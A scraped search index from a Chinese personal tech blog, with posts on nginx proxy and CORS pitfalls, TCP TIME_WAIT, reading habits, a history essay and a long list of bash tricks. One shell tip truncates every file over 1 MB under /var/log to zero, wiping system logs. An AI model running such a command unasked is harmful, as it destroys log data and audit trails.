无规律 周期性 时间 集中在某个时间点发生 按固定时间间隔发生 空间 集中在某个空间发生 人物 集中在某个人物身上发生 ","title":"故障的特征分析方法"},{"content":"下文的论述都以下面的配置为例子\nlocation ^~ /p/security { rewrite /p/security/(.*) /security/$1 break; proxy_pass http://security:8080; proxy_redirect off; proxy_set_header Host $host; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; } 如果dns无法解析,nginx则无法启动 security如果无法解析,那么nginx则无法启动 DNS缓存问题: nginx启动时,如果将security dns解析为1.2.3.4。如果security的ip地址变了。nginx不会自动解析新的ip地址,导致反向代理报错504。 反向代理的DNS缓存问题务必重视 跨域头配置的always 反向代理一般都是希望允许跨域的。如果不加always,那么只会对成功的请求加跨域头,失败的请求则不会。 关于**\u0026lsquo;Access-Control-Allow-Origin\u0026rsquo; \u0026lsquo;*\u0026rsquo;,如果后端服务本身就带有这个头,那么如果你在nginx中再添加这个头,就会在浏览器中遇到下面的报错。而解决办法就是不要在nginx中设置这个头。**\nAccess to fetch at \u0026#39;http://192.168.40.107:31088/p/security/v2/login\u0026#39; from origin \u0026#39;http://localhost:5000\u0026#39; has been blocked by CORS policy: Response to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header contains multiple values \u0026#39;*, *\u0026#39;, but only one is allowed. Have the server send the header with a valid value, or, if an opaque response serves your needs, set the request\u0026#39;s mode to \u0026#39;no-cors\u0026#39; to fetch the resource with CORS disabled. 
参考链接 http://nginx.org/en/docs/http/ngx_http_headers_module.html http://www.hxs.biz/html/20180425122255.html https://blog.csdn.net/xiojing825/article/details/83383524 https://cloud.tencent.com/developer/article/1470375 https://blog.csdn.net/bbg221/article/details/79886979 ","permalink":"https://wdd.js.org/posts/2020/02/ngse8g/","summary":"下文的论述都以下面的配置为例子\nlocation ^~ /p/security { rewrite /p/security/(.*) /security/$1 break; proxy_pass http://security:8080; proxy_redirect off; proxy_set_header Host $host; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; } 如果dns无法解析,nginx则无法启动 security如果无法解析,那么nginx则无法启动 DNS缓存问题: nginx启动时,如果将security dns解析为1.2.3.4。如果security的ip地址变了。nginx不会自动解析新的ip地址,导致反向代理报错504。 反向代理的DNS缓存问题务必重视 跨域头配置的always 反向代理一般都是希望允许跨域的。如果不加always,那么只会对成功的请求加跨域头,失败的请求则不会。 关于**\u0026lsquo;Access-Control-Allow-Origin\u0026rsquo; \u0026lsquo;*\u0026rsquo;,如果后端服务本身就带有这个头,那么如果你在nginx中再添加这个头,就会在浏览器中遇到下面的报错。而解决办法就是不要在nginx中设置这个头。**\nAccess to fetch at \u0026#39;http://192.168.40.107:31088/p/security/v2/login\u0026#39; from origin \u0026#39;http://localhost:5000\u0026#39; has been blocked by CORS policy: Response to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header contains multiple values \u0026#39;*, *\u0026#39;, but only one is allowed.","title":"我走过的nginx反向代理的坑"},{"content":"2018年1月26日,我在京东上买了一个Kindle Paperwhite, 距离今天,大概已经2年多一点了。\n我是一个重度读者,每天都会花上一些时间去阅读。最近两天发现,本来可以连续两周不用充电的kindle。基本上现在是电量以每天50%的速度减少。或许,2年,就是kindle的寿命。\n刚开始读书总觉得没有什么进度,后来我就喜欢把每天读书的进度给记录下来。这样做的好处是能够督促我不要偷懒,\n我读书有个习惯,每天以至少1%的进度去读一本书,并且我会将进度记录下来。基本上,我每天会读7-8本书的1%。\n两年时间内我读过的书,要比我从小学到大学读过的书都要多。\n","permalink":"https://wdd.js.org/posts/2020/02/amkcs2/","summary":"2018年1月26日,我在京东上买了一个Kindle Paperwhite, 
距离今天,大概已经2年多一点了。\n我是一个重度读者,每天都会花上一些时间去阅读。最近两天发现,本来可以连续两周不用充电的kindle。基本上现在是电量以每天50%的速度减少。或许,2年,就是kindle的寿命。\n刚开始读书总觉得没有什么进度,后来我就喜欢把每天读书的进度给记录下来。这样做的好处是能够督促我不要偷懒,\n我读书有个习惯,每天以至少1%的进度去读一本书,并且我会将进度记录下来。基本上,我每天会读7-8本书的1%。\n两年时间内我读过的书,要比我从小学到大学读过的书都要多。","title":"kindle阅读器的寿命"},{"content":"在事务结束之后,仍然保持在打开状态的链接称为持久连接。非持久的链接在每个事务结束之后就会关闭。\n持久连接的好处 避免缓慢的链接建立阶段 避免慢启动的拥塞适应阶段 Keep-Alive 客户端发起请求,带有Connection: Keep-Alive头。服务端在响应头中回应Connection: Keep-Alive。则说明服务端同意持久连接。\n如果服务端不同意持久连接,就会在响应头中返回Connection: Close\n注意事项\n即使服务端同意了持久连接,服务端也可以随时关闭连接 HTTP 1.0 协议,必须显式传递Connection: Keep-Alive,服务端才会激活持久连接 HTTP 1.1 协议,默认就是持久连接 在通信双方中,主动关闭连接的一方会进入TIME_WAIT状态,而被动关闭的一方则不会进入该状态。\nTIME_WAIT连接太多 服务端太多的TIME_WAIT连接,则说明连接是服务端主动去关闭的。查看了响应头,内容也是Connection: Close。\n我们知道,一般情况下TIME_WAIT状态的链接至少会持续60秒。也就是说该连接占用的内存至少在60秒内不会释放。\n当连接太多时,就有可能产生out of memory的问题,而操作系统就会很有可能把这个进程给kill掉,进而导致服务不可用。\n","permalink":"https://wdd.js.org/network/sq4l53/","summary":"在事务结束之后,仍然保持在打开状态的链接称为持久连接。非持久的链接在每个事务结束之后就会关闭。\n持久连接的好处 避免缓慢的链接建立阶段 避免慢启动的拥塞适应阶段 Keep-Alive 客户端发起请求,带有Connection: Keep-Alive头。服务端在响应头中回应Connection: Keep-Alive。则说明服务端同意持久连接。\n如果服务端不同意持久连接,就会在响应头中返回Connection: Close\n注意事项\n即使服务端同意了持久连接,服务端也可以随时关闭连接 HTTP 1.0 协议,必须显式传递Connection: Keep-Alive,服务端才会激活持久连接 HTTP 1.1 协议,默认就是持久连接 在通信双方中,主动关闭连接的一方会进入TIME_WAIT状态,而被动关闭的一方则不会进入该状态。\nTIME_WAIT连接太多 服务端太多的TIME_WAIT连接,则说明连接是服务端主动去关闭的。查看了响应头,内容也是Connection: Close。\n我们知道,一般情况下TIME_WAIT状态的链接至少会持续60秒。也就是说该连接占用的内存至少在60秒内不会释放。\n当连接太多时,就有可能产生out of memory的问题,而操作系统就会很有可能把这个进程给kill掉,进而导致服务不可用。","title":"TIME_WAIT与持久连接"},{"content":"最早听说“三过家门而不入”,是说禹治水大公无私,路过家门都没有回家。\n最近看到史记,发现这句话原本是\n禹伤先人父鲧(发音和滚相同)功之不成受诛,乃劳身焦思,居外十三年,过家门不敢入\n\u0026ldquo;三过家门而不入\u0026quot;这个短语中, 
与原文少一个“敢”字,少了一个字,含义差距很大。\n没有敢字,说明是自己主动的。加上敢字,则会让人思考。禹为什么不敢回家?他在怕什么呢?\n这里就需要提到禹的父亲鲧。\n鲧治水九年,没有把水治理好。在舜巡视的时候,被赐死在羽山。\n舜登用,摄行天子之政,巡狩。行视鲧之治水无状,乃殛(发音和即相同)鲧于羽山以死\n所以,如果禹治不好水,你想禹的下场是什么?\n","permalink":"https://wdd.js.org/posts/2020/01/encss4/","summary":"最早听说“三过家门而不入”,是说禹治水大公无私,路过家门都没有回家。\n最近看到史记,发现这句话原本是\n禹伤先人父鲧(发音和滚相同)功之不成受诛,乃劳身焦思,居外十三年,过家门不敢入\n\u0026ldquo;三过家门而不入\u0026quot;这个短语中, 与原文少一个“敢”字,少了一个字,含义差距很大。\n没有敢字,说明是自己主动的。加上敢字,则会让人思考。禹为什么不敢回家?他在怕什么呢?\n这里就需要提到禹的父亲鲧。\n鲧治水九年,没有把水治理好。在舜巡视的时候,被赐死在羽山。\n舜登用,摄行天子之政,巡狩。行视鲧之治水无状,乃殛(发音和即相同)鲧于羽山以死\n所以,如果禹治不好水,你想禹的下场是什么?","title":"论禹三过家门而不入的真实原因"},{"content":"在《tcp/ip详解卷一》中,有幅图介绍了TCP的状态迁移,TCP的状态转移并不简单,我们本次重点关注TIME_WAIT状态。\nTIME-WAIT 主机1发起FIN关闭连接请求,主机2发送ACK确认,然后也发送FIN。主机1在收到FIN之后,向主机2发送了ACK。\n在主机1发送ACK时,主机1就进入了TIME-WAIT状态。\n主动发起关闭连接的一方会有TIME-WAIT状态 如果两方同时发起关闭连接请求,那么两方都会进入TIME-WAIT状态 TIME-WAIT的时长在 /proc/sys/net/ipv4/tcp_fin_timeout 中配置,一般是60s 为什么要有TIME-WAIT状态? 太多TIME-WAIT链接是否意味着有故障? ","permalink":"https://wdd.js.org/network/yoc1k0/","summary":"在《tcp/ip详解卷一》中,有幅图介绍了TCP的状态迁移,TCP的状态转移并不简单,我们本次重点关注TIME_WAIT状态。\nTIME-WAIT 主机1发起FIN关闭连接请求,主机2发送ACK确认,然后也发送FIN。主机1在收到FIN之后,向主机2发送了ACK。\n在主机1发送ACK时,主机1就进入了TIME-WAIT状态。\n主动发起关闭连接的一方会有TIME-WAIT状态 如果两方同时发起关闭连接请求,那么两方都会进入TIME-WAIT状态 TIME-WAIT的时长在 /proc/sys/net/ipv4/tcp_fin_timeout 中配置,一般是60s 为什么要有TIME-WAIT状态? 太多TIME-WAIT链接是否意味着有故障? 
","title":"漫话TCP TIME-WAIT状态【ing】"},{"content":"命令行编辑 向左移动光标\tctrl + b 向右移动光标\tctrl + f 移动光标到行尾\tctrl + e 移动光标到行首\tctrl + a 清除前面一个词\tctrl + w 清除光标到行首\tctrl + u 清除光标到行尾\tctrl + k 命令行搜索\tctrl + r 解压与压缩 1、压缩命令: 命令格式:\ntar -zcvf 压缩文件名 .tar.gz 被压缩文件名 可先切换到当前目录下,压缩文件名和被压缩文件名都可加入路径。\n2、解压缩命令: 命令格式:\ntar -zxvf 压缩文件名.tar.gz 解压缩后的文件只能放在当前的目录。\ncrontab 每隔x秒执行一次 每隔5秒\n* * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔15秒\n* * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 awk从第二行开始读取 awk \u0026#39;NR\u0026gt;2{print $1}\u0026#39; 查找大文件,并清空文件内容 find /var/log -type f -size +1M -exec truncate --size 0 \u0026#39;{}\u0026#39; \u0026#39;;\u0026#39; switch case 语句 echo \u0026#39;Input a number between 1 to 4\u0026#39; echo \u0026#39;Your number is:\\c\u0026#39; read aNum case $aNum in 1) echo \u0026#39;You select 1\u0026#39; ;; 2) echo \u0026#39;You select 2\u0026#39; ;; 3) echo \u0026#39;You select 3\u0026#39; ;; 4) echo \u0026#39;You select 4\u0026#39; ;; *) echo \u0026#39;You do not select a number between 1 to 4\u0026#39; ;; esac 以$开头的特殊变量 echo $$ # 进程pid echo $# # 收到的参数个数 echo $@ # 列表方式的参数 $1 $2 $3 echo $? # 上个进程的退出码 echo $* # 类似列表方式,但是参数被当做一个实体, \u0026#34;$1c$2c$3\u0026#34; c是IFS的第一个字符 echo $0 # 脚本名 echo $1 $2 $3 # 第一、第二、第三个参数 for i in $@ do echo $i done for j in $@ do echo $j done 判断git仓库是否clean check_is_repo_clean () { if [ -n \u0026#34;$(git status --porcelain)\u0026#34; ]; then echo \u0026#34;Working directory is not clean\u0026#34; exit 1 fi } 文件批处理 for in循环 for f in *.txt; do mv $f $f.gz; done for d in *.gz; do gunzip $d; done shell 重定向到/dev/null ls \u0026amp;\u0026gt;/dev/null; #标准错误和标准输出都不想看 ls 1\u0026gt;/dev/null; #不想看标准输出 ls 2\u0026gt;/dev/null; 标准错误不想看 sed: -e expression #1, char 21: unknown option to `s' 出现这个问题,一般是要替换的字符串中也有/符号,所以要把分隔符改成 ! 
或者 |\nsed -i \u0026#34;s!WJ_CONF_URL!$WJ_CONF_URL!g\u0026#34; file.txt 发送UDP消息 在shell是bash的时候, 可以使用 echo 或者 cat将内容重定向到 /dev/udp/ip/port中,来发送udp消息\necho \u0026#34;hello\u0026#34; \u0026gt; /dev/udp/192.168.1.1/8000 grep排除自身 下面查找名称包括rtpproxy的进程,grep出来找到这个进程外,还找到了grep这条语句的进程,一般来说,这个进程是多余的。\n➜ ~ ps aux | grep rtpproxy root 3353 0.3 0.0 186080 968 ? Sl 2019 250:05 rtpproxy -f -l root 31440 0.0 0.0 112672 980 pts/0 S+ 10:12 0:00 grep --color=auto --exclude-dir=.bzr --exclude-dir=CVS --exclude-dir=.git --exclude-dir=.hg --exclude-dir=.svn rtpproxy 但是,如果我们用中括号,将搜索关键词的第一个字符包裹起来,就可以排除grep自身。\n[root@localhost ~]# ps aux | grep \u0026#39;[r]tpproxy\u0026#39; root 3353 0.3 0.0 186080 968 ? Sl 2019 250:06 rtpproxy -f -l ","permalink":"https://wdd.js.org/shell/all-in-one/","summary":"命令行编辑 向左移动光标\tctrl + b 向右移动光标\tctrl + f 移动光标到行尾\tctrl + e 移动光标到行首\tctrl + a 清除前面一个词\tctrl + w 清除光标到行首\tctrl + u 清除光标到行尾\tctrl + k 命令行搜索\tctrl + r 解压与压缩 1、压缩命令: 命令格式:\ntar -zcvf 压缩文件名 .tar.gz 被压缩文件名 可先切换到当前目录下,压缩文件名和被压缩文件名都可加入路径。\n2、解压缩命令: 命令格式:\ntar -zxvf 压缩文件名.tar.gz 解压缩后的文件只能放在当前的目录。\ncrontab 每隔x秒执行一次 每隔5秒\n* * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔15秒\n* * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 awk从第二行开始读取 awk \u0026#39;NR\u0026gt;2{print $1}\u0026#39; 查找大文件,并清空文件内容 find /var/log -type f -size +1M -exec truncate --size 0 \u0026#39;{}\u0026#39; \u0026#39;;\u0026#39; switch case 语句 echo \u0026#39;Input a number between 1 to 4\u0026#39; echo \u0026#39;Your number is:\\c\u0026#39; read aNum case $aNum in 1) echo \u0026#39;You select 1\u0026#39; ;; 2) echo \u0026#39;You select 2\u0026#39; ;; 3) echo \u0026#39;You select 3\u0026#39; ;; 4) echo \u0026#39;You select 4\u0026#39; ;; *) echo \u0026#39;You do not select a number between 1 to 4\u0026#39; ;; esac 以$开头的特殊变量 echo $$ # 进程pid echo $# # 收到的参数个数 echo $@ # 列表方式的参数 $1 $2 $3 echo $?","title":"常用shell技巧"},{"content":"参考 
https://www.opensips.org/Documentation/Tutorials-WebSocket-2-2 https://opensips.org/pub/events/2016-05-10_OpenSIPS-Summit_Amsterdam/Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf pdf附件 Eric_Tamme-OpenSIPS_Summit_Austin_2015-WebRTC_with_OpenSIPS.pdf Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf ","permalink":"https://wdd.js.org/opensips/ch9/webrtc-pdf/","summary":"参考 https://www.opensips.org/Documentation/Tutorials-WebSocket-2-2 https://opensips.org/pub/events/2016-05-10_OpenSIPS-Summit_Amsterdam/Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf pdf附件 Eric_Tamme-OpenSIPS_Summit_Austin_2015-WebRTC_with_OpenSIPS.pdf Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf ","title":"opensips 与 webrtc资料整理"},{"content":"yum install zsh -y # github上的项目下载太慢,所以我就把项目克隆到gitee上,这样克隆速度就非常快 git clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh # 这一步是可选的 cp ~/.zshrc ~/.zshrc.orig # 这一步是必须的 cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc # 改变默认的sh, 如果这一步报错,就再次输入 zsh chsh -s $(which zsh) ","permalink":"https://wdd.js.org/shell/manu-install-ohmyzsh/","summary":"yum install zsh -y # github上的项目下载太慢,所以我就把项目克隆到gitee上,这样克隆速度就非常快 git clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh # 这一步是可选的 cp ~/.zshrc ~/.zshrc.orig # 这一步是必须的 cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc # 改变默认的sh, 如果这一步报错,就再次输入 zsh chsh -s $(which zsh) ","title":"手工安装oh-my-zsh"},{"content":"define(`CF_INNER_IP\u0026#39;, `esyscmd(`printf \u0026#34;$PWD\u0026#34;\u0026#39;)\u0026#39;) ","permalink":"https://wdd.js.org/shell/m4-env/","summary":"define(`CF_INNER_IP\u0026#39;, `esyscmd(`printf \u0026#34;$PWD\u0026#34;\u0026#39;)\u0026#39;) ","title":"m4读取环境变量"},{"content":"字符串 字符串包含 Using a test:\nif [[ $var == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in var.\u0026#34; fi # Inverse (substring not in string). 
if [[ $var != *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is not in var.\u0026#34; fi # This works for arrays too! if [[ ${arr[*]} == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in array.\u0026#34; fi Using a case statement:\ncase \u0026#34;$var\u0026#34; in *sub_string*) # Do stuff ;; *sub_string2*) # Do more stuff ;; *) # Else ;; esac 字符串开始 if [[ $var == sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var starts with sub_string.\u0026#34; fi # Inverse (var does not start with sub_string). if [[ $var != sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var does not start with sub_string.\u0026#34; fi 字符串结尾 if [[ $var == *sub_string ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var ends with sub_string.\u0026#34; fi # Inverse (var does not end with sub_string). if [[ $var != *sub_string ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var does not end with sub_string.\u0026#34; fi 循环 数字范围循环 Alternative to seq.\n# Loop from 0-100 (no variable support). for i in {0..100}; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$i\u0026#34; done 变量循环 Alternative to seq.\n# Loop from 0-VAR. VAR=50 for ((i=0;i\u0026lt;=VAR;i++)); do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$i\u0026#34; done 数组遍历 arr=(apples oranges tomatoes) # Just elements. for element in \u0026#34;${arr[@]}\u0026#34;; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$element\u0026#34; done 索引遍历 arr=(apples oranges tomatoes) # Elements and index. for i in \u0026#34;${!arr[@]}\u0026#34;; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;${arr[i]}\u0026#34; done # Alternative method. for ((i=0;i\u0026lt;${#arr[@]};i++)); do printf \u0026#39;%s\\n\u0026#39; \u0026#34;${arr[i]}\u0026#34; done 文件或者目录遍历 Don’t use ls.\n# Greedy example. for file in *; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # PNG files in dir. 
for file in ~/Pictures/*.png; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # Iterate over directories. for dir in ~/Downloads/*/; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$dir\u0026#34; done # Brace Expansion. for file in /path/to/parentdir/{file1,file2,subdir/file3}; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # Iterate recursively. shopt -s globstar for file in ~/Pictures/**/*; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done shopt -u globstar 文件处理 CAVEAT: bash does not handle binary data properly in versions \u0026lt; 4.4.\n将文件读取为字符串 Alternative to the cat command.\nfile_data=\u0026#34;$(\u0026lt;\u0026#34;file\u0026#34;)\u0026#34; 将文件按行读取成数组 Alternative to the cat command.\n# Bash \u0026lt;4 (discarding empty lines). IFS=$\u0026#39;\\n\u0026#39; read -d \u0026#34;\u0026#34; -ra file_data \u0026lt; \u0026#34;file\u0026#34; # Bash \u0026lt;4 (preserving empty lines). while read -r line; do file_data+=(\u0026#34;$line\u0026#34;) done \u0026lt; \u0026#34;file\u0026#34; # Bash 4+ mapfile -t file_data \u0026lt; \u0026#34;file\u0026#34; 获取文件头部的 N 行 Alternative to the head command.\nCAVEAT: Requires bash 4+\nExample Function:\nhead() { # Usage: head \u0026#34;n\u0026#34; \u0026#34;file\u0026#34; mapfile -tn \u0026#34;$1\u0026#34; line \u0026lt; \u0026#34;$2\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${line[@]}\u0026#34; } Example Usage:\n$ head 2 ~/.bashrc # Prompt PS1=\u0026#39;➜ \u0026#39; $ head 1 ~/.bashrc # Prompt 获取尾部 N 行 Alternative to the tail command.\nCAVEAT: Requires bash 4+\nExample Function:\ntail() { # Usage: tail \u0026#34;n\u0026#34; \u0026#34;file\u0026#34; mapfile -tn 0 line \u0026lt; \u0026#34;$2\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${line[@]: -$1}\u0026#34; } Example Usage:\n$ tail 2 ~/.bashrc # Enable tmux. 
# [[ -z \u0026#34;$TMUX\u0026#34; ]] \u0026amp;\u0026amp; exec tmux $ tail 1 ~/.bashrc # [[ -z \u0026#34;$TMUX\u0026#34; ]] \u0026amp;\u0026amp; exec tmux 获取文件行数 Alternative to wc -l.\nExample Function (bash 4):\nlines() { # Usage: lines \u0026#34;file\u0026#34; mapfile -tn 0 lines \u0026lt; \u0026#34;$1\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${#lines[@]}\u0026#34; } Example Function (bash 3):\nThis method uses less memory than the mapfile method and works in bash 3 but it is slower for bigger files.\nlines_loop() { # Usage: lines_loop \u0026#34;file\u0026#34; count=0 while IFS= read -r _; do ((count++)) done \u0026lt; \u0026#34;$1\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;$count\u0026#34; } Example Usage:\n$ lines ~/.bashrc 48 $ lines_loop ~/.bashrc 48 计算文件或者文件夹数量 This works by passing the output of the glob to the function and then counting the number of arguments.\nExample Function:\ncount() { # Usage: count /path/to/dir/* # count /path/to/dir/*/ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$#\u0026#34; } Example Usage:\n# Count all files in dir. $ count ~/Downloads/* 232 # Count all dirs in dir. $ count ~/Downloads/*/ 45 # Count all jpg files in dir. $ count ~/Pictures/*.jpg 64 创建临时文件 Alternative to touch.\n# Shortest. \u0026gt;file # Longer alternatives: :\u0026gt;file echo -n \u0026gt;file printf \u0026#39;\u0026#39; \u0026gt;file 在两个标记之间抽取 N 行 Example Function:\nextract() { # Usage: extract file \u0026#34;opening marker\u0026#34; \u0026#34;closing marker\u0026#34; while IFS=$\u0026#39;\\n\u0026#39; read -r line; do [[ $extract \u0026amp;\u0026amp; $line != \u0026#34;$3\u0026#34; ]] \u0026amp;\u0026amp; printf \u0026#39;%s\\n\u0026#39; \u0026#34;$line\u0026#34; [[ $line == \u0026#34;$2\u0026#34; ]] \u0026amp;\u0026amp; extract=1 [[ $line == \u0026#34;$3\u0026#34; ]] \u0026amp;\u0026amp; extract= done \u0026lt; \u0026#34;$1\u0026#34; } Example Usage:\n# Extract code blocks from MarkDown file. 
$ extract ~/projects/pure-bash/README.md \u0026#39;```sh\u0026#39; \u0026#39;```\u0026#39; # Output here... 文件路径 获取文件的目录 Alternative to the dirname command.\nExample Function:\ndirname() { # Usage: dirname \u0026#34;path\u0026#34; local tmp=${1:-.} [[ $tmp != *[!/]* ]] \u0026amp;\u0026amp; { printf \u0026#39;/\\n\u0026#39; return } tmp=${tmp%%\u0026#34;${tmp##*[!/]}\u0026#34;} [[ $tmp != */* ]] \u0026amp;\u0026amp; { printf \u0026#39;.\\n\u0026#39; return } tmp=${tmp%/*} tmp=${tmp%%\u0026#34;${tmp##*[!/]}\u0026#34;} printf \u0026#39;%s\\n\u0026#39; \u0026#34;${tmp:-/}\u0026#34; } Example Usage:\n$ dirname ~/Pictures/Wallpapers/1.jpg /home/black/Pictures/Wallpapers $ dirname ~/Pictures/Downloads/ /home/black/Pictures 获取文件路径的 base-name Alternative to the basename command.\nExample Function:\nbasename() { # Usage: basename \u0026#34;path\u0026#34; [\u0026#34;suffix\u0026#34;] local tmp tmp=${1%\u0026#34;${1##*[!/]}\u0026#34;} tmp=${tmp##*/} tmp=${tmp%\u0026#34;${2/\u0026#34;$tmp\u0026#34;}\u0026#34;} printf \u0026#39;%s\\n\u0026#39; \u0026#34;${tmp:-/}\u0026#34; } Example Usage:\n$ basename ~/Pictures/Wallpapers/1.jpg 1.jpg $ basename ~/Pictures/Wallpapers/1.jpg .jpg 1 $ basename ~/Pictures/Downloads/ Downloads 变量 变量声明和使用 $ hello_world=\u0026#34;value\u0026#34; # Create the variable name. $ var=\u0026#34;world\u0026#34; $ ref=\u0026#34;hello_$var\u0026#34; # Print the value of the variable name stored in \u0026#39;hello_$var\u0026#39;. $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;${!ref}\u0026#34; value Alternatively, on bash 4.3+:\n$ hello_world=\u0026#34;value\u0026#34; $ var=\u0026#34;world\u0026#34; # Declare a nameref. 
$ declare -n ref=hello_$var $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$ref\u0026#34; value 基于变量命名变量 $ var=\u0026#34;world\u0026#34; $ declare \u0026#34;hello_$var=value\u0026#34; $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$hello_world\u0026#34; value ESCAPE SEQUENCES Contrary to popular belief, there is no issue in utilizing raw escape sequences. Using tput abstracts the same ANSI sequences as if printed manually. Worse still, tput is not actually portable. There are a number of tput variants each with different commands and syntaxes (try tput setaf 3 on a FreeBSD system). Raw sequences are fine.\n文本颜色 NOTE: Sequences requiring RGB values only work in True-Color Terminal Emulators.\nSequence What does it do? Value \\e[38;5;\u0026lt;NUM\u0026gt;m Set text foreground color. 0-255 \\e[48;5;\u0026lt;NUM\u0026gt;m Set text background color. 0-255 \\e[38;2;\u0026lt;R\u0026gt;;\u0026lt;G\u0026gt;;\u0026lt;B\u0026gt;m Set text foreground color to RGB color. R, G, B \\e[48;2;\u0026lt;R\u0026gt;;\u0026lt;G\u0026gt;;\u0026lt;B\u0026gt;m Set text background color to RGB color. R, G, B 文本属性 NOTE: Prepend 2 to any code below to turn it\u0026rsquo;s effect off(examples: 21=bold text off, 22=faint text off, 23=italic text off).\nSequence What does it do? \\e[m Reset text formatting and colors. \\e[1m Bold text. \\e[2m Faint text. \\e[3m Italic text. \\e[4m Underline text. \\e[5m Blinking text. \\e[7m Highlighted text. \\e[8m Hidden text. \\e[9m Strike-through text. 光标移动 Sequence What does it do? Value \\e[\u0026lt;LINE\u0026gt;;\u0026lt;COLUMN\u0026gt;H Move cursor to absolute position. line, column \\e[H Move cursor to home position (0,0). \\e[\u0026lt;NUM\u0026gt;A Move cursor up N lines. num \\e[\u0026lt;NUM\u0026gt;B Move cursor down N lines. num \\e[\u0026lt;NUM\u0026gt;C Move cursor right N columns. num \\e[\u0026lt;NUM\u0026gt;D Move cursor left N columns. num \\e[s Save cursor position. \\e[u Restore cursor position. 文本擦除 Sequence What does it do? 
\\e[K Erase from cursor position to end of line. \\e[1K Erase from cursor position to start of line. \\e[2K Erase the entire current line. \\e[J Erase from the current line to the bottom of the screen. \\e[1J Erase from the current line to the top of the screen. \\e[2J Clear the screen. \\e[2J\\e[H Clear the screen and move cursor to 0,0. 参数展开 指令 Parameter What does it do? ${!VAR} Access a variable based on the value of VAR. ${!VAR*} Expand to IFS separated list of variable names starting with VAR. ${!VAR@} Expand to IFS separated list of variable names starting with VAR. If double-quoted, each variable name expands to a separate word. 替换 Parameter What does it do? ${VAR#PATTERN} Remove shortest match of pattern from start of string. ${VAR##PATTERN} Remove longest match of pattern from start of string. ${VAR%PATTERN} Remove shortest match of pattern from end of string. ${VAR%%PATTERN} Remove longest match of pattern from end of string. ${VAR/PATTERN/REPLACE} Replace first match with string. ${VAR//PATTERN/REPLACE} Replace all matches with string. ${VAR/PATTERN} Remove first match. ${VAR//PATTERN} Remove all matches. 长度 Parameter What does it do? ${#VAR} Length of var in characters. ${#ARR[@]} Length of array in elements. 展开 Parameter What does it do? ${VAR:OFFSET} Remove first N chars from variable. ${VAR:OFFSET:LENGTH} Get substring from N character to N character. (${VAR:10:10}: Get sub-string from char 10 to char 20) ${VAR:: OFFSET} Get first N chars from variable. ${VAR:: -OFFSET} Remove last N chars from variable. ${VAR: -OFFSET} Get last N chars from variable. ${VAR:OFFSET:-OFFSET} Cut first N chars and last N chars. 大小写修改 Parameter What does it do? CAVEAT ${VAR^} Uppercase first character. bash 4+ ${VAR^^} Uppercase all characters. bash 4+ ${VAR,} Lowercase first character. bash 4+ ${VAR,,} Lowercase all characters. bash 4+ ${VAR~} Reverse case of first character. bash 4+ ${VAR~~} Reverse case of all characters. bash 4+ 默认值 Parameter What does it do? 
